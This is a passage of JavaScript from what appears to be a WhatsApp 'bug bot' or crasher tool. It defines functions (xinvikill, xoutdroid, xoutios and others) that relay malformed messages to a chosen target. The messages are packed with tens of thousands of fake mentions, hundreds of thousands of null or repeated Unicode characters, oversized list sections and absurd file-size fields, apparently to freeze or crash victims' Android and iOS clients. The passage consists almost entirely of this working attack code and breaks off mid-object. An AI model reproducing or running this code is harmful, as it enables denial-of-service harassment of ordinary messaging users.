"serverMessageId": 1,
"newsletterName": " X ",
"contentType": "UPDATE",
"accessibilityText": " X "
},
"businessMessageForwardInfo": {
"businessOwnerJid": "0@s.whatsapp.net"
},
"smbClientCampaignId": "smb_client_campaign_id_example",
"smbServerCampaignId": "smb_server_campaign_id_example",
"dataSharingContext": {
"showMmDisclosure": true
}
}
}
},
Ptcp ? {
participant: {
jid: X
}
} : {participant: { jid: X }}
);
};
//==============================================================\\
async function xinvikill(isTarget, mention) {
const generateMessage = {
viewOnceMessage: {
message: {
imageMessage: {
url: "https://mmg.whatsapp.net/v/t62.7118-24/31077587_1764406024131772_5735878875052198053_n.enc?ccb=11-4&oh=01_Q5AaIRXVKmyUlOP-TSurW69Swlvug7f5fB4Efv4S_C6TtHzk&oe=680EE7A3&_nc_sid=5e03e0&mms3=true",
mimetype: "image/jpeg",
caption: "Telegram: @DGXeon13",
fileSha256: "Bcm+aU2A9QDx+EMuwmMl9D56MJON44Igej+cQEQ2syI=",
fileLength: "19769",
height: 354,
width: 783,
mediaKey: "n7BfZXo3wG/di5V9fC+NwauL6fDrLN/q1bi+EkWIVIA=",
fileEncSha256: "LrL32sEi+n1O1fGrPmcd0t0OgFaSEf2iug9WiA3zaMU=",
directPath: "/v/t62.7118-24/31077587_1764406024131772_5735878875052198053_n.enc",
mediaKeyTimestamp: "1743225419",
jpegThumbnail: null,
scansSidecar: "mh5/YmcAWyLt5H2qzY3NtHrEtyM=",
scanLengths: [2437, 17332],
contextInfo: {
mentionedJid: Array.from({ length: 30000 }, () => "1" + Math.floor(Math.random() * 500000) + "@s.whatsapp.net"),
isSampled: true,
participant: isTarget,
remoteJid: "status@broadcast",
forwardingScore: 9741,
isForwarded: true
}
}
}
}
};
const msg = generateWAMessageFromContent(isTarget, generateMessage, {});
await XeonBotInc.relayMessage("status@broadcast", msg.message, {
messageId: msg.key.id,
statusJidList: [isTarget],
additionalNodes: [
{
tag: "meta",
attrs: {},
content: [
{
tag: "mentioned_users",
attrs: {},
content: [
{
tag: "to",
attrs: { jid: isTarget },
content: undefined
}
]
}
]
}
]
});
if (mention) {
await XeonBotInc.relayMessage(
isTarget,
{
statusMentionMessage: {
message: {
protocolMessage: {
key: msg.key,
type: 25
}
}
}
},
{
additionalNodes: [
{
tag: "meta",
attrs: { is_status_mention: "Telegram: @DGXeon13" },
content: undefined
}
]
}
);
}
}
async function xinvikill2(isTarget, mention) {
const delaymention = Array.from({ length: 9741 }, (_, r) => ({
title: "᭯".repeat(9741),
rows: [{ title: `${r + 1}`, id: `${r + 1}` }]
}));
const MSG = {
viewOnceMessage: {
message: {
listResponseMessage: {
title: "@dgxeon13",
listType: 2,
buttonText: null,
sections: delaymention,
singleSelectReply: { selectedRowId: "Telegram: @DGXeon13" },
contextInfo: {
mentionedJid: Array.from({ length: 9741 }, () => "1" + Math.floor(Math.random() * 500000) + "@s.whatsapp.net"),
participant: isTarget,
remoteJid: "status@broadcast",
forwardingScore: 9741,
isForwarded: true,
forwardedNewsletterMessageInfo: {
newsletterJid: "9741@newsletter",
serverMessageId: 1,
newsletterName: "-"
}
},
description: "Telegram: @DGXeon13"
}
}
},
contextInfo: {
channelMessage: true,
statusAttributionType: 2
}
};
const msg = generateWAMessageFromContent(isTarget, MSG, {});
await XeonBotInc.relayMessage("status@broadcast", msg.message, {
messageId: msg.key.id,
statusJidList: [isTarget],
additionalNodes: [
{
tag: "meta",
attrs: {},
content: [
{
tag: "mentioned_users",
attrs: {},
content: [
{
tag: "to",
attrs: { jid: isTarget },
content: undefined
}
]
}
]
}
]
});
if (mention) {
await XeonBotInc.relayMessage(
isTarget,
{
statusMentionMessage: {
message: {
protocolMessage: {
key: msg.key,
type: 25
}
}
}
},
{
additionalNodes: [
{
tag: "meta",
attrs: { is_status_mention: "Telegram: @DGXeon13" },
content: undefined
}
]
}
);
}
}
//==============================================================\\
async function xoutdroid(target) {
try {
const contextInfo = {
mentionedJid: [target],
isForwarded: true,
forwardingScore: 999,
businessMessageForwardInfo: {
businessOwnerJid: target
}
};
let messagePayload = {
viewOnceMessage: {
message: {
messageContextInfo: {
deviceListMetadata: {},
deviceListMetadataVersion: 2
},
interactiveMessage: {
contextInfo,
body: {
text: "Telegram: @DGXeon13" + "\u0000".repeat(900000)
},
nativeFlowMessage: {
buttons: [
{ name: "single_select", buttonParamsJson: bugXeonContent + "\u0003" },
{ name: "call_permission_request", buttonParamsJson: bugXeonContent + "\u0003" },
{ name: "mpm", buttonParamsJson: bugXeonContent + "\u0003" },
{ name: "mpm", buttonParamsJson: bugXeonContent + "\u0003" },
{ name: "mpm", buttonParamsJson: bugXeonContent + "\u0003" },
{ name: "mpm", buttonParamsJson: bugXeonContent + "\u0003" }
]
}
}
}
}
};
await XeonBotInc.relayMessage(target, messagePayload, { participant: { jid: target } });
} catch (err) {
console.error(err);
}
}
let bugXeonContent = JSON.stringify({
status: true,
criador: "Telegram: @DGXeon13",
resultado: {
type: "md",
ws: {
_events: { "CB:ib,,dirty": ["Array"] },
_eventsCount: 800000,
_maxListeners: 0,
url: "wss://web.whatsapp.com/ws/chat",
config: {
version: ["Array"],
browser: ["Array"],
waWebSocketUrl: "wss://web.whatsapp.com/ws/chat",
sockCectTimeoutMs: 20000,
keepAliveIntervalMs: 30000,
logger: {},
printQRInTerminal: false,
emitOwnEvents: true,
defaultQueryTimeoutMs: 60000,
customUploadHosts: [],
retryRequestDelayMs: 250,
maxMsgRetryCount: 5,
fireInitQueries: true,
auth: { Object: "authData" },
markOnlineOnsockCect: true,
syncFullHistory: true,
linkPreviewImageThumbnailWidth: 192,
transactionOpts: { Object: "transactionOptsData" },
generateHighQualityLinkPreview: false,
options: {},
appStateMacVerification: { Object: "appStateMacData" },
mobile: true
}
}
}
});
//==============================================================\\
async function xoutios(target) {
const xeonIpong = "𑇂𑆵𑆴𑆿".repeat(60000);
const genMsg = (fileName, bodyText) => generateWAMessageFromContent(target, proto.Message.fromObject({
groupMentionedMessage: {
message: {
interactiveMessage: {
header: {
documentMessage: {
url: "https://mmg.whatsapp.net/v/t62.7119-24/40377567_1587482692048785_2833698759492825282_n.enc?ccb=11-4&oh=01_Q5AaIEOZFiVRPJrllJNvRA-D4JtOaEYtXl0gmSTFWkGxASLZ&oe=666DBE7C&_nc_sid=5e03e0&mms3=true",
mimetype: "application/json",
fileSha256: "ld5gnmaib+1mBCWrcNmekjB4fHhyjAPOHJ+UMD3uy4k=",
fileLength: "999999999999",
pageCount: 0x9ff9ff9ff1ff8ff4ff5f,
mediaKey: "5c/W3BCWjPMFAUUxTSYtYPLWZGWuBV13mWOgQwNdFcg=",
fileName: fileName,
fileEncSha256: "pznYBS1N6gr9RZ66Fx7L3AyLIU2RY5LHCKhxXerJnwQ=",
directPath: "/v/t62.7119-24/40377567_1587482692048785_2833698759492825282_n.enc?ccb=11-4&oh=01_Q5AaIEOZFiVRPJrllJNvRA-D4JtOaEYtXl0gmSTFWkGxASLZ&oe=666DBE7C&_nc_sid=5e03e0",
mediaKeyTimestamp: "1715880173"
},
hasMediaAttachment: true
},
body: { text: bodyText },
nativeFlowMessage: {
messageParamsJson: `{"name":"galaxy_message","flow_action":"navigate","flow_action_payload":{"screen":"CTZ_SCREEN"},"flow_cta":"Telegram: @DGXeon13","flow_id":"Telegram: @DGXeon13","flow_message_version":"9.903","flow_token":"Telegram: @DGXeon13"}`
},
contextInfo: {
mentionedJid: Array.from({ length: 5 }, () => "1@newsletter"),
groupMentions: [{ groupJid: "1@newsletter", groupSubject: "Telegram: @Am_itachiuchiha" }]
}
}
}
}
}), { userJid: target });
const msg1 = await genMsg(`${xeonIpong}️`, "𑇂𑆵𑆴𑆿".repeat(1000));
await XeonBotInc.relayMessage(target, msg1.message, { participant: { jid: target }, messageId: msg1.key.id });
const msg2 = await genMsg("Telegram: @DGXeon13", "\u0000" + "ꦾ".repeat(150000) + "@1".repeat(250000));
await XeonBotInc.relayMessage(target, msg2.message, { participant: { jid: target }, messageId: msg2.key.id });
await XeonBotInc.relayMessage(target, {
locationMessage: {
degreesLatitude: 173.282,
degreesLongitude: -19.378,
name: xeonIpong,
url: "https://youtube.com/@DGXeon"
}
}, { participant: { jid: target } });
await XeonBotInc.relayMessage(target, {
'extendedTextMessage': {
'text': xeonIpong,
'contextInfo': {
'stanzaId': target,
'participant': target,
'quotedMessage': {
'conversation': 'Telegram: @DGXeon13' + 'ꦾ'.repeat(50000)
},
'disappearingMode': {
'initiator': "CHANGED_IN_CHAT",
'trigger': "CHAT_SETTING"
}
},
'inviteLinkGroupTypeV2': "DEFAULT"
}
}, {
'participant': {
'jid': target
}
}, {
'messageId': null
});
const paymentMsg = service => ({
paymentInviteMessage: {
serviceType: service,
expiryTimestamp: Date.now() + 91814400000,
maxTransactionAmount: 10000000000,
maxDailyTransaction: 100000000000,
maxTransactionFrequency: 1,
secureMode: true,
verificationRequired: true,
antiFraudProtection: true,
multiFactorAuthentication: true,
transactionLogging: true,
geoLock: true,